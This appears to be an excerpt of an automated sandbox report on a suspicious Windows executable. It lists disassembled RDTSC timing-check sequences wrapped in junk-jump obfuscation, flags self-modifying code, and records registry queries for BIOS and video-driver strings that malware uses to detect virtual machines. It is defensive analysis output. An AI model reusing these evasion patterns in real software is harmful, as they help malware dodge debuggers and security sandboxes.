            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507088C second address: 50708A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA6C4CAD56Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50708A0 second address: 50708A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507092D second address: 5060169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6C4CAD511h 0x00000009 jmp 00007FA6C4CAD50Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FA6C4CAD518h 0x00000015 and esi, 422A22F8h 0x0000001b jmp 00007FA6C4CAD50Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 retn 0004h 0x00000027 nop 0x00000028 sub esp, 04h 0x0000002b cmp eax, 00000000h 0x0000002e setne al 0x00000031 xor ebx, ebx 0x00000033 test al, 01h 0x00000035 jne 00007FA6C4CAD507h 0x00000037 mov dword ptr [esp], 0000000Dh 0x0000003e call 00007FA6C952A891h 0x00000043 mov edi, edi 0x00000045 pushad 0x00000046 mov ax, 2FCDh 0x0000004a pushfd 0x0000004b jmp 00007FA6C4CAD50Ah 0x00000050 add ax, 78E8h 0x00000055 jmp 00007FA6C4CAD50Bh 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007FA6C4CAD50Bh 0x00000065 mov bx, si 0x00000068 popad 0x00000069 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060169 second address: 50601D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA6C4EBA087h 0x00000011 and cx, B63Eh 0x00000016 jmp 00007FA6C4EBA089h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA6C4EBA088h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50601D7 second address: 50601F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, 24F9D1F1h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50601F0 second address: 5060221 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 9Ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6C4EBA083h 0x0000000b popad 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA6C4EBA080h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060221 second address: 5060225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060225 second address: 506022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506022B second address: 5060277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov ah, 34h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA6C4CAD510h 0x00000010 mov dword ptr [esp], ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA6C4CAD518h 0x0000001c or cx, 4BE8h 0x00000021 jmp 00007FA6C4CAD50Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060277 second address: 50602BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4EBA07Fh 0x00000008 mov si, 36CFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 call 00007FA6C4EBA07Fh 0x0000001e mov esi, 235348AFh 0x00000023 pop esi 0x00000024 mov eax, edi 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA6C4EBA07Ah 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50603D8 second address: 50603DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50603DE second address: 50603E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50603E2 second address: 506040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA6C4CAD7BEh 0x0000000e pushad 0x0000000f mov ax, CA9Fh 0x00000013 popad 0x00000014 lea ecx, dword ptr [ebp-14h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA6C4CAD511h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506040C second address: 5060412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060412 second address: 5060416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060416 second address: 506041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506041A second address: 5060439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA6C4CAD512h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060453 second address: 5060457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060457 second address: 5060472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD517h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060472 second address: 506048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4EBA084h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506048A second address: 506049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506049F second address: 5060561 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6C4EBA081h 0x00000008 xor ch, 00000046h 0x0000000b jmp 00007FA6C4EBA081h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FA6C4EBA080h 0x00000019 and esi, 28B6F1E8h 0x0000001f jmp 00007FA6C4EBA07Bh 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FA6C4EBA089h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA6C4EBA083h 0x00000036 adc esi, 27B74E8Eh 0x0000003c jmp 00007FA6C4EBA089h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FA6C4EBA080h 0x00000048 and cl, 00000008h 0x0000004b jmp 00007FA6C4EBA07Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060586 second address: 506058D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506058D second address: 50605AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FA735A77F5Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50605AF second address: 50605CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50605CC second address: 5060693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0B72h 0x00000007 pushfd 0x00000008 jmp 00007FA6C4EBA083h 0x0000000d add al, 0000006Eh 0x00000010 jmp 00007FA6C4EBA089h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 js 00007FA6C4EBA111h 0x0000001f jmp 00007FA6C4EBA07Eh 0x00000024 cmp dword ptr [ebp-14h], edi 0x00000027 pushad 0x00000028 movzx eax, dx 0x0000002b pushfd 0x0000002c jmp 00007FA6C4EBA083h 0x00000031 xor cx, 4C2Eh 0x00000036 jmp 00007FA6C4EBA089h 0x0000003b popfd 0x0000003c popad 0x0000003d jne 00007FA735A77EBBh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov cx, bx 0x00000049 pushfd 0x0000004a jmp 00007FA6C4EBA07Fh 0x0000004f add eax, 6C27623Eh 0x00000055 jmp 00007FA6C4EBA089h 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060693 second address: 50606E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA6C4CAD513h 0x00000015 and si, 7CFEh 0x0000001a jmp 00007FA6C4CAD519h 0x0000001f popfd 0x00000020 push esi 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50606E4 second address: 5060702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, dx 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060702 second address: 5060708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060708 second address: 506075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FA6C4EBA080h 0x00000011 push eax 0x00000012 jmp 00007FA6C4EBA07Bh 0x00000017 xchg eax, esi 0x00000018 jmp 00007FA6C4EBA086h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 467E7C00h 0x00000026 mov edx, 2C4F582Ch 0x0000002b popad 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506075B second address: 5060761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060761 second address: 5060765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060765 second address: 5060769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060769 second address: 506077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, 6Ch 0x0000000e push edx 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506077A second address: 5060780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060780 second address: 5060784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060784 second address: 50607A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4CAD517h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50607EA second address: 50607EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50607EE second address: 50607F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50607F2 second address: 50607F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50607F8 second address: 5060040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FA6C4CAD510h 0x00000010 je 00007FA73586B339h 0x00000016 xor eax, eax 0x00000018 jmp 00007FA6C4C86C3Ah 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov edi, eax 0x0000002a xor ebx, ebx 0x0000002c cmp edi, 00000000h 0x0000002f je 00007FA6C4CAD717h 0x00000035 call 00007FA6C952A538h 0x0000003a mov edi, edi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FA6C4CAD516h 0x00000044 jmp 00007FA6C4CAD515h 0x00000049 popfd 0x0000004a mov ah, D2h 0x0000004c popad 0x0000004d mov bx, C860h 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060040 second address: 5060044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060044 second address: 5060048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060048 second address: 506004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506004E second address: 5060073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060073 second address: 5060077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060077 second address: 506007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 506007D second address: 5060083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060083 second address: 5060087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060BDE second address: 5060BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060BE3 second address: 5060BE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060BE8 second address: 5060C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FA6C4EBA086h 0x00000014 pop esi 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060C12 second address: 5060C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD518h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060C2E second address: 5060C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060C32 second address: 5060C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75C7459Ch], 05h 0x0000000f pushad 0x00000010 mov si, dx 0x00000013 mov eax, edi 0x00000015 popad 0x00000016 je 00007FA73585B2BDh 0x0000001c pushad 0x0000001d pushad 0x0000001e mov esi, edi 0x00000020 movsx edx, cx 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060C5E second address: 5060C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5060C62 second address: 5060C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50709A0 second address: 50709A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50709A6 second address: 50709C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 7115h 0x0000000e mov ecx, 60CF0991h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50709C1 second address: 5070A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA6C4EBA07Ch 0x00000012 sub esi, 2D256148h 0x00000018 jmp 00007FA6C4EBA07Bh 0x0000001d popfd 0x0000001e jmp 00007FA6C4EBA088h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007FA6C4EBA080h 0x0000002a push eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FA6C4EBA081h 0x00000032 or si, 6FC6h 0x00000037 jmp 00007FA6C4EBA081h 0x0000003c popfd 0x0000003d mov dl, al 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 mov ecx, ebx 0x00000044 movsx ebx, si 0x00000047 popad 0x00000048 mov esi, dword ptr [ebp+0Ch] 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FA6C4EBA07Ah 0x00000052 or cl, FFFFFF98h 0x00000055 jmp 00007FA6C4EBA07Bh 0x0000005a popfd 0x0000005b popad 0x0000005c test esi, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070A7F second address: 5070A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070A96 second address: 5070AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FA735A5798Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, C96Ch 0x00000018 call 00007FA6C4EBA085h 0x0000001d pop esi 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070AC5 second address: 5070B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6C4CAD50Ch 0x00000009 or ecx, 50A89AB8h 0x0000000f jmp 00007FA6C4CAD50Bh 0x00000014 popfd 0x00000015 call 00007FA6C4CAD518h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e cmp dword ptr [75C7459Ch], 05h 0x00000025 jmp 00007FA6C4CAD511h 0x0000002a je 00007FA735862E82h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FA6C4CAD513h 0x00000039 sub ah, FFFFFF8Eh 0x0000003c jmp 00007FA6C4CAD519h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FA6C4CAD510h 0x00000048 and al, 00000008h 0x0000004b jmp 00007FA6C4CAD50Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070B76 second address: 5070B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070B7C second address: 5070B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070B80 second address: 5070BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FA6C4EBA086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6C4EBA07Eh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070BB9 second address: 5070BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6C4CAD511h 0x00000009 sub ah, 00000036h 0x0000000c jmp 00007FA6C4CAD511h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070BEE second address: 5070BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070CD9 second address: 5070CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSpecial instruction interceptor: First address: 808A42 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSpecial instruction interceptor: First address: 9C6851 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
